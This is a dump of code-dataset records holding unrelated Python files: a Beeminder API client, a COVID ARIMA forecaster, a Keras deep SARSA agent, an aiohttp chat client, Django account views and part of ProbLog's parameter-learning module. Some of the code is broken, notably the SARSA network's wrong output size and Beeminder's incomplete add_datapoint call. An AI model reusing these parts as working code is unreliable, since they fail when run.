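print_iteration above builds its aligned row with np.array2string and a float_kind formatter; an isolated example of that call with made-up values:

import numpy as np

row = np.array([0.5, -1.25, 3e-4])
# A custom float_kind formatter yields fixed-width scientific notation;
# slicing [1:-1] strips the surrounding brackets, as the report code does.
text = np.array2string(
    row, separator="\t",
    formatter={"float_kind": lambda v: "{0: 10.4e}".format(v)},
)[1:-1]
print(text)   # " 5.0000e-01\t-1.2500e+00\t 3.0000e-04"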
It is assumed that ALL the\n row of `x` are inside this domain.\n fun_evals : int\n Number of function evaluations needed to obtain the sample `x`\n\n Returns\n -------\n str\n Results report message to be printed in the terminal/cmd.\n \"\"\"\n kdtree = cKDTree(data=x)\n euc_dom_rng = norm((ub - lb), ord=2)\n neigh_idx = kdtree.query_ball_point(x=(x[index, :]), r=(r * euc_dom_rng))\n results_msg = '\\nBest feasible value found: {0:8.4f} at point\\nx = {1}\\n{2} points are within {3:.3%} euclidian range of this point based on original domain.\\nNumber of function evaluations: {4}'\n num_arr = np.array2string((x[index, :]), precision=4, separator='\\t', sign=' ')[1:-1]\n results_msg = results_msg.format(f[index], num_arr, len(neigh_idx), r, fun_evals)\n if self.terminal:\n print(Fore.RESET + results_msg)\n return results_msg","sub_path":"pycfiles/surropt-0.0.10-py3-none-any/output.cpython-36.py","file_name":"output.cpython-36.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"186779544","text":"import urllib\nimport urllib.request as urllib2\nimport settings\nimport json\nimport sys\n\n\n# based on https://www.beeminder.com/api\nclass Beeminder:\n def __init__(self, this_auth_token):\n self._auth_token=this_auth_token\n self.base_url='https://www.beeminder.com/api/v1'\n\n def get_user(self,username):\n url = \"%s/users/%s.json\" % (self.base_url,username)\n values = {'auth_token':self._auth_token}\n result = self.call_api(url,values,'GET')\n return result\n\n def get_goal(self,username,goalname):\n url = \"%s/users/%s/goals/%s.json\" % (self.base_url,username,goalname)\n values = {'auth_token':self._auth_token}\n result = self.call_api(url,values,'GET')\n return result\n\n def get_datapoints(self,username,goalname):\n url = self.base_url+'users/'+username+'/goals/'+goalname+'/datapoints.json'\n url = \"%s/users/%s/goals/%s/datapoints.json\" % (self.base_url,username,goalname)\n values = {'auth_token':self._auth_token}\n result = self.call_api(url,values,'GET')\n return result\n\n def create_datapoint(self,username,goalname,timestamp,value,comment=' ',sendmail='false'):\n url = self.base_url+'users/'+username+'/goals/'+goalname+'/datapoints.json'\n url = \"%s/users/%s/goals/%s/datapoints.json\" % (self.base_url,username,goalname)\n values = {'auth_token':self._auth_token, 'timestamp':timestamp, 'value':value, 'comment':comment, 'sendmail':sendmail}\n result = self.call_api(url,values,'POST')\n return result\n\n def call_api(self,url,values,method='GET'):\n result=''\n data = urllib.parse.urlencode(values)\n if method=='POST':\n req = urllib2.Request(url,data.encode())\n response = urllib2.urlopen(req)\n else:\n response = urllib2.urlopen(url+'?'+data)\n result=response.read()\n return result\n\n\nclass User(Beeminder):\n def __init__(self, username=settings.BEEMINDER_USERNAME,\n this_auth_token=settings.BEEMINDER_AUTH_TOKEN):\n self.user = username\n Beeminder.__init__(self, this_auth_token)\n ud = Beeminder.get_user(self, username)\n ud = json.loads(ud)\n self._goals = ud['goals']\n\n def add_datapoint(self, goal, data, timestamp=None, comment='', sendmail='false'):\n if goal not in self._goals:\n print(\"Goal not found in available goals.\")\n return -1\n else:\n res = Beeminder.create_datapoint(self, username=self.username, )\n return 
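get_results_report above counts sample points within r% of the domain's euclidian range using cKDTree.query_ball_point; a self-contained version on random 2-D data (bounds and radius fraction invented):

import numpy as np
from scipy.linalg import norm
from scipy.spatial import cKDTree

rng = np.random.default_rng(0)
lb, ub = np.zeros(2), np.ones(2) * 10.0
x = rng.uniform(lb, ub, size=(200, 2))

r = 0.05                                # 5% of the domain range
radius = r * norm(ub - lb, ord=2)       # sqrt(200) * 0.05 here
tree = cKDTree(x)
neighbours = tree.query_ball_point(x[0], r=radius)
print(len(neighbours))                  # the query point itself is included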
res","sub_path":"beeminderpy.py","file_name":"beeminderpy.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"183152617","text":"\"\"\"\r\n\r\nA simple Stress test on Covid Dataset using ARIMA \r\nAuthor : Babak.EA \r\nDate : 2020-03-20, Persian New year \r\nTarget : ARIMA stress test on infected population per Country \r\n\r\n\"\"\"\r\n\r\n###############################\r\n\r\nfrom IPython.display import display\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib\r\nimport pandas as pd\r\nfrom pandas.io.json import json_normalize \r\nimport numpy as np\r\nimport statsmodels\r\nimport datetime\r\nimport urllib, json\r\nfrom statsmodels.tsa.arima_model import ARIMA\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom pmdarima.arima import auto_arima\r\nimport sys\r\nimport warnings\r\nimport ipywidgets as widgets\r\nfrom IPython.display import display\r\n\r\n\r\nif not sys.warnoptions:\r\n warnings.simplefilter(\"ignore\")\r\n\r\n\r\n#################################\r\n####### Database : Json #########\r\nURL=\"https://pomber.github.io/covid19/timeseries.json\"\r\n\r\n#################################\r\n\r\nclass Covid:\r\n def __init__(self,URL):\r\n self.URL=URL\r\n\r\n self.Load_Json()\r\n self.Json_to_Pandas()\r\n self.Json_to_Pandas_kids()\r\n\r\n def Load_Json(self):# input Json URL, Output: Json Data\r\n json_url =urllib.request.urlopen(self.URL)\r\n self.data = json.loads(json_url.read())\r\n self.Country_list=list(self.data.keys())\r\n \r\n def Json_to_Pandas(self): # Json to Pandas DataFrame\r\n DF=json_normalize(self.data[self.Country_list[0]])\r\n DF.set_index([\"date\"], inplace = True, \r\n append = False, drop = True)\r\n \r\n Col=[self.Country_list[0],self.Country_list[0]+\"_D\",self.Country_list[0]+\"_R\"]\r\n DF.columns=Col\r\n DF.index=pd.to_datetime(DF.index)\r\n self.DF=DF\r\n\r\n \r\n def Json_to_Pandas_kids(self):\r\n for i in self.Country_list[1:]:\r\n df_tem=json_normalize(self.data[i])\r\n df_tem.set_index([\"date\"], inplace = True, \r\n append = False, drop = True)\r\n Col=[i,i+\"_D\",i+\"_R\"]\r\n df_tem.columns=Col\r\n self.DF = pd.concat([self.DF, df_tem], axis=1)\r\n\r\n\r\n\r\nclass Country_select(Covid):\r\n \r\n def __init__(self):\r\n Covid.__init__(self,URL)\r\n self.ALL='ALL'\r\n \r\n self.dropdown_class =widgets.Dropdown(options =\r\n sorted(['ALL','EXIT']+ self.Country_list), description= \"Select Country: \" )\r\n self.flag=\"All\"\r\n\r\n self.output = widgets.Output()\r\n \r\n self.dropdown_class.observe(self.dropdown_class_eventhandler, names='value')\r\n \r\n display(self.dropdown_class)\r\n display(self.output)\r\n\r\n \"\"\"\r\n def unique_sorted_values_plus_ALL(self,array):\r\n self.array=array\r\n \r\n unique = self.array.unique().tolist()\r\n unique.sort()\r\n unique.insert(0, self.ALL)\r\n self.unique=unique\r\n \"\"\"\r\n\r\n def dropdown_class_eventhandler(self,name):\r\n #print(name)\r\n \r\n #print(self.dropdown_class.value)\r\n self.change=self.dropdown_class.value\r\n\r\n self.output.clear_output()\r\n #Col=\r\n with self.output:\r\n\r\n if (self.change== self.ALL):\r\n display(self.DF)\r\n \r\n elif(self.change==\"EXIT\" ):\r\n print(\"Thnak you for using my Library\")\r\n \r\n \r\n else:\r\n Col=[x for x in self.DF.columns.tolist() if self.change in x]\r\n self.df=self.DF[Col]\r\n Country_select.ARIMA_Death_Ratio(self.DF[Col])\r\n \r\n #display(df)\r\n def ARIMA_Death_Ratio(df):\r\n\r\n 
col=df.columns.tolist()\r\n train=df[0:-5] \r\n test=df[-6:] \r\n model=auto_arima(train[col[0]], start_p=1, start_q=1,\r\n max_p=30, max_q=30, m=10,\r\n start_P=0, seasonal=True,\r\n d=1, D=1, trace=True,\r\n error_action='ignore', \r\n suppress_warnings=True, \r\n stepwise=True)\r\n print(model.aic())\r\n\r\n model.fit(train[col[0]])\r\n\r\n forcast = model.predict(n_periods=len(test[col[0]]))\r\n forcast = pd.DataFrame(forcast,index = test.index,columns=['Prediction'])\r\n\r\n train[\"Class\"]=\"Training\"\r\n test[\"Class\"]=\"Valid Data\"\r\n forcast[col[1]]=0\r\n forcast[col[2]]=0\r\n forcast[\"Class\"]=\"Forcast\"\r\n forcast.columns=train.columns.tolist() \r\n DF_SNS=pd.concat([train,test,forcast])\r\n DF_SNS['Day']=DF_SNS.index\r\n DF_SNS[col[0]] = DF_SNS[col[0]].astype(np.float64)\r\n\r\n ax = sns.lineplot(x=\"Day\", y=col[0],\r\n hue=\"Class\", style=\"Class\",\r\n markers=True, dashes=False, data=DF_SNS)\r\n\r\n ax.set_xticklabels(DF_SNS['Day'],rotation=45)\r\n ax.set(xlabel=col[0]+\"__Daily Report\", ylabel= \"Number of Infected in \"+col[0])\r\n\r\n \r\n\r\n plt.show()\r\n \r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"data/Covid_19_Babak_old_v1.py","file_name":"Covid_19_Babak_old_v1.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"277265280","text":"import copy\nimport pylab\nimport random\nimport numpy as np\nfrom environment import Env\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\nfrom keras.models import Sequential\n\nEPISODES = 2500\n\nclass DeepSARSAAgent:\n def __init__(self):\n self.load_model = False\n\n # 가능한 모든 행동\n self.action_space = [0, 1, 2, 3, 4]\n\n # 상태의 크기와 행동의 크기\n self.action_size = len(self.action_space)\n self.state_size = 15\n self.discount_factor =0.99\n self.learning_rate = 0.001\n\n self.epsilon = 1\n self.epsilon_decay = .9999\n self.epsilon_min = 0.01\n\n # build_model은 처음 agent를 호출할 때 한 번 실행\n self.model = self.build_model()\n\n if self.load_model:\n self.model.load_weights('./save_model/deep_sarsa_trained.h5') # 이거는 뭘까\n\n # 상태가 입력, 큐함수가 출력인 인공신경망\n def build_model(self):\n model = Sequential()\n\n model.add(Dense(30, input_dim=self.state_size, activation='relu'))\n model.add(Dense(30, activation='relu'))\n\n # 출력으로 나오는 게 큐함수인데 큐함수는 0과 1 사이의 값이 아니기 때문에 출력층의 활성함수는 선형함수\n model.add(Dense(self.state_size, activation='linear'))\n\n model.summary()\n model.compile(loss='mse', optimizer=Adam(lr=self.learning_rate))\n return model\n\n def get_action(self, state):\n if np.random.rand() <= self.epsilon:\n return random.randrange(self.action_size)\n else:\n state = np.float32(state)\n\n # state를 모델에 집어넣어서 출력을 반환\n q_values = self.model.predict(state)\n\n # 출력이 [[],[],[],[],[]]형식이기 때문에 [0]을 붙여서 한꺼풀 벗김, 5개(행동의 개수)의 큐함수\n return np.argmax(q_values[0])\n\n def train_model(self, state, action, reward, next_state, next_action, done):\n\n # 딥살사는 입실론을 계속 감소 시킴 : 초반에는 탐험을 자주 하고, 후에는 탐험을 줄임 -> 예측대로 움직임\n if self.epsilon > self.epsilon_min:\n self.epsilon *= self.epsilon_decay\n\n # 케라스에 들어가는 입력은 float 이어야 함\n state = np.float32(state)\n next_state = np.float32(next_state)\n target = self.model.predict(state)[0]\n\n if done:\n target[action] = reward\n else: # 살사의 큐함수 업데이트 식에서 정답(타깃) : R + r*Q(s',a')\n target[action] = (reward + self.discount_factor *\n self.model.predict(next_state)[0][next_action])\n # 실제로 수행한 행동에 해당하는 큐함수에 대해서만 오류함수를 계산해야함^^^^^^^^^^^^, 다른 4개의 큐함수는 오차가 0\n\n # 계산한 타깃과 상태 입력으로 인공신경망을 업데이트\n # 출력값 
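ARIMA_Death_Ratio above fits pmdarima's auto_arima on all but the last five points and indexes the forecast by test.index so it lines up with the observations when plotted. A stripped-down sketch on synthetic counts (the seasonal search is simplified relative to the original m=10 setting):

import numpy as np
import pandas as pd
from pmdarima.arima import auto_arima   # optional dependency, as in the file

rng = np.random.default_rng(1)
y = pd.Series(np.cumsum(rng.poisson(30, 60)).astype(float))
train, test = y[:-5], y[-5:]

model = auto_arima(train, seasonal=False, suppress_warnings=True,
                   error_action="ignore")
forecast = pd.DataFrame(np.asarray(model.predict(n_periods=len(test))),
                        index=test.index, columns=["Prediction"])
print(forecast)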
reshape : model.predict(state)의 출력 형태로 변형\n target = np.reshape(target, [1, 5])\n\n # 인공신경망 업데이트\n self.model.fit(state, target, epochs=1, verbose=0)\n\n\nif __name__ == \"__main__\":\n env = Env()\n agent = DeepSARSAAgent()\n\n global_step = 0\n scores, episodes = [], []\n\n for e in range(EPISODES):\n done = False\n score = 0\n state = env.reset()\n state = np.reshape(state, [1, 15])\n\n while not done:\n global_step += 1\n\n # 1. 현재 상태에 대한 행동 선택\n action = agent.get_action(state)\n\n # 2. 행동을 취한 후 환경에서 한 타임스텝 진행, 3. 환경으로부터 다음 상태와 보상을 받음\n next_state, reward, done = env.step(action)\n\n # reshape는 데이터는 그대로 두고 차원만을 바꿔주는 함수\n next_state = np.reshape(next_state, [1, 15])\n\n # 4. 다음 상태에 대한 행동을 선택\n next_action = agent.get_action(next_state)\n\n # 5. 환경으로부터 받은 정보를 토대로 학습을 진행\n # 기존의 큐함수 테이블 대신 인공신경망을 사용함, 입력 : 상태의 특징들, 출력 : 각 행동에 대한 큐함수(근사된 거)\n agent.train_model(state, action, reward, next_state, next_action, done)\n\n state = next_state\n score += reward\n state = copy.deepcopy(next_state)\n\n if done:\n # 에피소드마다 학습 결과 출력\n scores.append(score)\n episodes.append(e)\n pylab.plot(episodes, scores, 'b')\n pylab.savefig(\"./save_graph/deep-sarsa.png\")\n print(\"episode:\", e, \"score:\", score, \"global_step\", global_step, \"epsilon:\", agent.epsilon)\n\n # 100 에피소드마다 모델 저장\n if e % 100 == 0:\n agent.model.save_weights(\"./save_model/deep_sarsa.h5\")","sub_path":"GridWorld/DeepSarsa/deep_sarsa_agent.py","file_name":"deep_sarsa_agent.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"394499936","text":"import aiohttp\nimport asyncio\nimport aioredis\nfrom aioconsole import ainput\n\nfrom settings import config\n\n\nasync def foo():\n await ainput(\"Text here:\")\n\n\nasync def ws_client():\n session = aiohttp.ClientSession()\n\n async with session.ws_connect('http://0.0.0.0:8080/ws') as ws:\n await login(ws)\n await prompt(ws)\n async for msg in ws:\n print('Receive from server:', msg.data)\n await prompt(ws)\n\n\nasync def prompt(ws):\n # msg = input('type message: ')\n await ws.send_str(await ainput(\"message: \"))\n\n\nasync def login(ws):\n await ws.send_str(await ainput(\"Username: \"))\n await ws.send_str(await ainput(\"Password: \"))\n\nasyncio.get_event_loop().run_until_complete(ws_client())\n","sub_path":"app_gif/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"473080209","text":"# _*_ coding:utf-8 _*_\n'''\n@author: caimmy@qq.com\n@license: FREE\n@contact: http://www.github.com/caimmy\n@software: in ksg\n@file: predfines\n@time: 17-4-13 下午3:48\n@desc:\n\n'''\n\nTAG_ENABLE = '1' # 启用标签\nTAG_DISABLE = '0' # 禁用标签","sub_path":"core/predfines.py","file_name":"predfines.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"169404498","text":"from django.shortcuts import render, redirect, reverse, HttpResponse\nfrom .forms import UserRegisterForm, UserLoginForm, UserForgetForm, UserResetForm, UserChangeInfoForm, \\\n UserChangeImageform, UserSendCodeForm, UserChangeEmailForm\nfrom .models import UserProfile, EmailVerify\nfrom django.db.models import Q\nfrom django.contrib.auth import authenticate, login, logout\nfrom helptools.send_mail_tool import send_email_verify\nfrom django.http import JsonResponse\nfrom datetime import datetime\nfrom operations.models import 
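train_model above regresses the network toward a target vector in which only the taken action's entry moves to R + gamma * Q(s', a'); the other entries keep the network's own prediction, so their error and gradient are zero. The update in isolation, with invented Q-vectors:

import numpy as np

def sarsa_target(q_s, action, reward, q_next, next_action, done, gamma=0.99):
    # Deep SARSA target: on-policy, so it uses the action actually chosen
    # in the next state (next_action), not the max over actions as in DQN.
    target = q_s.copy()
    target[action] = reward if done else reward + gamma * q_next[next_action]
    return target

q_s = np.array([0.1, 0.4, -0.2, 0.0, 0.3])
q_next = np.array([0.2, 0.1, 0.5, 0.0, -0.1])
print(sarsa_target(q_s, action=1, reward=1.0, q_next=q_next,
                   next_action=2, done=False))
# only index 1 changes: 1.0 + 0.99 * 0.5 = 1.495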
UserCourseInfo, UserLoveInfo, UserMessageInfo\nfrom orgs.models import OrgInfo, TeacherInfo\nfrom courses.models import CourseInfo\nfrom .models import Banner\nfrom django.views import View\n\n\nclass IndexView(View):\n def get(self, request):\n all_banners = Banner.objects.all().order_by('-add_time')[:5]\n all_bannercourses = CourseInfo.objects.filter(is_banner=True).order_by('-click_num')[:3]\n all_courses = CourseInfo.objects.filter(is_banner=False).order_by('-add_time')[:6]\n all_orgs = OrgInfo.objects.all().order_by('-click_num')[:15]\n return render(request, 'index.html', {\n 'all_banners': all_banners,\n 'all_bannercourses': all_bannercourses,\n 'all_courses': all_courses,\n 'all_orgs': all_orgs\n })\n\n\nclass UserRegisterView(View):\n def get(self, request):\n user_register_form = UserRegisterForm()\n return render(request, 'users/register.html', {\n 'user_register_form': user_register_form\n })\n\n def post(self, request):\n user_register_form = UserRegisterForm(request.POST)\n if user_register_form.is_valid():\n email = user_register_form.cleaned_data['email']\n password = user_register_form.cleaned_data['password']\n user = UserProfile.objects.filter(Q(email=email) | Q(username=email))\n if user:\n return render(request, 'users/register.html', {\n 'msg': '用户已经存在'\n })\n else:\n a = UserProfile()\n a.username = email\n a.email = email\n a.set_password(password)\n a.save()\n\n # 注册成功之后先创建一条消息存储,然后发邮件\n msg = UserMessageInfo()\n msg.userinfo = a.id\n msg.message = '欢迎注册尚在线'\n msg.save()\n\n send_email_verify(email, 'register')\n\n return HttpResponse('您的邮件已经发送,请尽快去激活')\n else:\n return render(request, 'users/register.html', {\n 'user_register_form': user_register_form\n })\n\n\ndef user_login(request):\n if request.method == 'GET':\n return render(request, 'users/login.html', {\n })\n else:\n user_login_form = UserLoginForm(request.POST)\n if user_login_form.is_valid():\n email = user_login_form.cleaned_data['email']\n password = user_login_form.cleaned_data['password']\n a = authenticate(username=email, password=password)\n if a:\n if a.is_start:\n login(request, a)\n msg = UserMessageInfo()\n msg.userinfo = a.id\n msg.message = '欢迎登录尚在线'\n msg.save()\n # return redirect(reverse('index'))\n url = request.COOKIES.get('url', '/')\n ret = redirect(url)\n ret.delete_cookie('url')\n return ret\n else:\n return HttpResponse('请去激活')\n else:\n return render(request, 'users/login.html', {\n 'msg': '用户名或者密码有误'\n })\n else:\n return render(request, 'users/login.html', {\n 'user_login_form': user_login_form\n })\n\n\ndef user_active(request, code):\n if code:\n email_ver = EmailVerify.objects.filter(code=code)[0]\n email = email_ver.email\n user = UserProfile.objects.filter(email=email)[0]\n user.is_start = True\n user.save()\n return redirect(reverse('users:user_login'))\n else:\n pass\n\n\ndef user_logout(request):\n logout(request)\n return redirect(reverse('index'))\n\n\ndef user_forget(request):\n if request.method == 'GET':\n user_forget_form = UserForgetForm()\n return render(request, 'users/user_forget.html', {\n 'user_forget_form': user_forget_form\n })\n else:\n user_forget_form = UserForgetForm(request.POST)\n if user_forget_form.is_valid():\n email = user_forget_form.cleaned_data['email']\n user = UserProfile.objects.filter(email=email)\n if user:\n send_email_verify(email, 'forget')\n return HttpResponse('请速去激活重置密码')\n else:\n return HttpResponse('您输入的邮箱不存在')\n else:\n return render(request, 'users/user_forget.html', {\n 'user_forget_form': user_forget_form\n })\n\n\ndef 
user_reset(request, code):\n if request.method == 'GET':\n if code:\n email_ver = EmailVerify.objects.filter(code=code)[0]\n email = email_ver.email\n user = UserProfile.objects.filter(email=email)[0]\n return render(request, 'users/user_reset.html', {\n 'user_id': user.id\n })\n else:\n pass\n else:\n user_reset_form = UserResetForm(request.POST)\n if user_reset_form.is_valid():\n password = user_reset_form.cleaned_data['password']\n password1 = user_reset_form.cleaned_data['password1']\n if code:\n user = UserProfile.objects.filter(id=int(code))\n if user:\n if password == password1:\n user[0].set_password(password)\n user[0].save()\n return redirect(reverse('users:user_login'))\n else:\n return render(request, 'users/user_reset.html', {\n 'msg': '两次密码不一致'\n })\n else:\n pass\n else:\n pass\n else:\n return render(request, 'users/user_reset.html', {\n 'user_reset_form': user_reset_form\n })\n\n\ndef user_info(request):\n return render(request, 'users/usercenter-info.html')\n\n\ndef user_changeimage(request):\n user_changeimage_form = UserChangeImageform(request.POST, request.FILES, instance=request.user)\n if user_changeimage_form.is_valid():\n user_changeimage_form.save(commit=True)\n return JsonResponse({'status': 'ok'})\n else:\n return JsonResponse({'status': 'fail'})\n\n\ndef user_changeinfo(request):\n user_change_info_form = UserChangeInfoForm(request.POST, instance=request.user)\n if user_change_info_form.is_valid():\n user_change_info_form.save(commit=True)\n return JsonResponse({'status': 'ok'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '修改失败'})\n\n\ndef user_sendcode(request):\n user_sendcode_form = UserSendCodeForm(request.POST)\n if user_sendcode_form.is_valid():\n email = user_sendcode_form.cleaned_data['email']\n useremail = UserProfile.objects.filter(Q(email=email) | Q(username=email))\n if useremail:\n return JsonResponse({'status': 'fail', 'msg': '邮箱已经被绑定'})\n else:\n email_ver = EmailVerify.objects.filter(email=email, send_type='changeemail').order_by('-add_time')\n if email_ver:\n if (datetime.now() - email_ver[0].add_time).seconds < 120:\n return JsonResponse({'status': 'ok', 'msg': '验证码已经发送过。。。'})\n\n send_email_verify(email, 'changeemail')\n return JsonResponse({'status': 'ok', 'msg': '修改邮箱验证码已经发送'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '邮箱不合法'})\n\n\ndef user_changeemail(request):\n user_changeemail_form = UserChangeEmailForm(request.POST)\n if user_changeemail_form.is_valid():\n email = user_changeemail_form.cleaned_data['email']\n code = user_changeemail_form.cleaned_data['code']\n email_code = EmailVerify.objects.filter(email=email, code=code)\n if email_code:\n request.user.username = email\n request.user.email = email\n request.user.save()\n return JsonResponse({'status': 'ok', 'msg': '修改成功'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '修改失败'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '修改失败'})\n\n\ndef user_course(request):\n usercourse_list = UserCourseInfo.objects.filter(userinfo=request.user)\n all_courses = [usercourse.courseinfo for usercourse in usercourse_list]\n\n return render(request, 'users/usercenter-mycourse.html', {\n 'all_courses': all_courses\n })\n\n\ndef user_loveorg(request):\n userorg_list = UserLoveInfo.objects.filter(userinfo=request.user, love_type=1, love_status=True)\n all_orgids = [userorg.love_id for userorg in userorg_list]\n all_orgs = OrgInfo.objects.filter(id__in=all_orgids)\n return render(request, 'users/usercenter-fav-org.html', {\n 'all_orgs': all_orgs\n 
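user_loveorg/user_lovecourse below resolve favourites in two steps because UserLoveInfo stores only (love_type, love_id) rather than a foreign key per target model. A sketch of that pattern, assuming the project's models are importable as in views.py:

# UserLoveInfo keeps a generic (love_type, love_id) pair, so favourites
# are resolved by collecting ids first, then filtering the target model.
from operations.models import UserLoveInfo
from orgs.models import OrgInfo

def loved_orgs(user):
    ids = UserLoveInfo.objects.filter(
        userinfo=user, love_type=1, love_status=True
    ).values_list("love_id", flat=True)
    return OrgInfo.objects.filter(id__in=list(ids))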
})\n\n\ndef user_loveteacher(request):\n userteacher_list = UserLoveInfo.objects.filter(userinfo=request.user, love_type=3, love_status=True)\n all_teacherids = [userteacher.love_id for userteacher in userteacher_list]\n all_teachers = TeacherInfo.objects.filter(id__in=all_teacherids)\n return render(request, 'users/usercenter-fav-teacher.html', {\n 'all_teachers': all_teachers\n })\n\n\ndef user_lovecourse(request):\n usercourse_list = UserLoveInfo.objects.filter(userinfo=request.user, love_type=2, love_status=True)\n all_courseids = [usercourse.love_id for usercourse in usercourse_list]\n all_courses = CourseInfo.objects.filter(id__in=all_courseids)\n return render(request, 'users/usercenter-fav-course.html', {\n 'all_courses': all_courses\n })\n\n\ndef user_message(request):\n all_messages = UserMessageInfo.objects.filter(userinfo=request.user.id)\n return render(request, 'users/usercenter-message.html', {\n 'all_messages': all_messages\n })\n\n\ndef user_readmessage(request):\n msgid = request.GET.get('msgid', '')\n if msgid:\n msg = UserMessageInfo.objects.filter(id=int(msgid))[0]\n msg.msg_status = True\n msg.save()\n return JsonResponse({'status': 'ok'})\n else:\n return JsonResponse({'status': 'fail'})\n\n\ndef handler_404(request):\n ret = render(request, '404.html')\n ret.status_code = 404\n return ret\n\n\ndef handler_500(request):\n ret = render(request, '500.html')\n ret.status_code = 500\n return ret\n","sub_path":"ShangOnline/apps/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"218648901","text":"#! /usr/bin/env python\n\n\"\"\"\nLearning from interpretations\n-----------------------------\nParameter learning for ProbLog.\nGiven a probabilistic program with parameterized weights and a set of partial implementations,\nlearns appropriate values of the parameters.\nContinuous distributions\n++++++++++++++++++++++++\nA parametrized weight can also be a continuous normal distribution if the atom it is associated\nwith only appears as a head (thus is not used in any bodies of other ProbLog rules).\nFor example, the following GMM:\n.. code-block:: prolog::\n t(0.5)::c.\n t(normal(1,10))::fa :- c.\n t(normal(10,10))::fa :- \\+c.\nwith evidence:\n.. code-block:: prolog::\n evidence(fa, 10).\n ---\n evidence(fa, 18).\n ---\n evidence(fa, 8).\nOr a multivariate GMM:\n.. code-block:: prolog\n t(0.5)::c.\n t(normal([1,1],[10,1,1,10]))::fa :- c.\n t(normal([10,10],[10,1,1,10]))::fa :- \\+c.\nwith evidence:\n.. code-block:: prolog\n evidence(fa, [10,11]).\n ---\n evidence(fa, [18,12]).\n ---\n evidence(fa, [8,7]).\nThe covariance matrix is represented as a row-based list ([[10,1],[1,10]] is [10,1,1,10]).\nThe GMM can also be represent compactly and as one examples:\n.. code-block:: prolog\n t(0.5)::c(ID,1); t(0.5)::c(ID,2).\n comp(1). comp(2).\n t(normal(_,_),C)::fa(ID) :- comp(C), c(ID,C).\nwith evidence:\n.. code-block:: prolog::\n evidence(fa(1), 10).\n evidence(fa(2), 18).\n evidence(fa(3), 8).\nAlgorithm\n+++++++++\nThe algorithm operates as follows:\n 0. Set initial values for the weights to learn.\n 1. Set the evidence present in the example.\n 2. Query the model for the weights of the atoms to be learned.\n 3. Update the weights to learn by taking the mean value over all examples and queries.\n 4. 
Repeat steps 1 to 4 until convergence (or a maximum number of iterations).\nThe score of the model for a given example is obtained by calculating the probability of the\nevidence in the example.\nImplementation\n++++++++++++++\nThe algorithm is implemented on top of the ProbLog toolbox.\nIt uses the following extensions of ProbLog's classes:\n * a LogicProgram implementation that rewrites the model and extracts the weights to learn\n (see :py:func:`learning.lfi.LFIProblem.__iter__`)\n * a custom semiring that looks up the current value of a weight to learn\n (see :py:func:`learning.lfi.LFIProblem.value`)\n.. autoclass:: learning.lfi.LFIProblem\n :members: __iter__, value\n\"\"\"\n\nfrom __future__ import print_function\n\nimport sys\nimport random\nimport math\nimport logging\n\ntry:\n from typing import List, Union\nexcept ImportError:\n List, Union = None, None\n\nfrom collections import defaultdict\nfrom itertools import chain\nfrom problog.util import init_logger\nfrom logging import getLogger\nfrom problog.engine import DefaultEngine, ground\nfrom problog.evaluator import (\n SemiringProbability,\n SemiringLogProbability,\n SemiringDensity,\n DensityValue,\n)\nfrom problog.logic import (\n Term,\n Constant,\n Clause,\n AnnotatedDisjunction,\n Or,\n Var,\n InstantiationError,\n ArithmeticError,\n term2list,\n list2term,\n Not,\n)\nfrom problog.program import PrologString, PrologFile, LogicProgram\nfrom problog.core import ProbLogError\nfrom problog.errors import process_error, InconsistentEvidenceError\n\n# Scipy and Numpy are optional installs (only required for continuous variables)\ntry:\n import scipy.stats as stats\nexcept ImportError:\n stats = None\ntry:\n import numpy as np\nexcept ImportError:\n np = None\n\nfrom problog import get_evaluatable, get_evaluatables\nimport traceback\n\n\ndef str2bool(s):\n if str(s) == \"true\":\n return True\n elif str(s) == \"false\":\n return False\n else:\n return None\n\n\ndef str2num(s):\n \"\"\"Translate a Term that represents a number or list of numbers to observations (as Python primitives).\n :return: Tuple of (isobserved?, values)\n \"\"\"\n if s.is_constant() and (s.is_float() or s.is_integer()):\n return True, s.compute_value()\n elif s.functor == \".\":\n values = term2list(s)\n numvalues = []\n for value in values:\n if isinstance(value, int) or isinstance(value, float):\n numvalues.append(value)\n else:\n return None, None\n return True, tuple(numvalues)\n else:\n return None, None\n\n\ncdist_names = [\"normal\"]\n\n\ndef dist_prob(d, x, eps=None, log=False, density=True):\n \"\"\"Compute the density of the value x given the distribution d (use interval 2*eps around x).\n Returns a polynomial\n :param d: Distribution Term\n :param x: Value\n :param log: use log-scale computations\n :return: Probability\n \"\"\"\n\n if stats is None or np is None:\n raise ProbLogError(\n \"Continuous variables require Scipy and Numpy to be installed.\"\n )\n\n if d.functor == \"normal\":\n if isinstance(d.args[0], Term) and d.args[0].functor == \".\":\n args = (term2list(d.args[0]), term2list(d.args[1]))\n else:\n args = d.args\n if isinstance(args[0], list): # multivariate\n m = args[0]\n ndim = len(m)\n cov = args[1]\n if len(cov) != ndim * ndim:\n raise ValueError(\"Distribution parameters do not match: {}\".format(d))\n cov = np.reshape(cov, (ndim, ndim))\n try:\n rv = stats.multivariate_normal(m, cov)\n except np.linalg.linalg.LinAlgError as exc:\n logger = 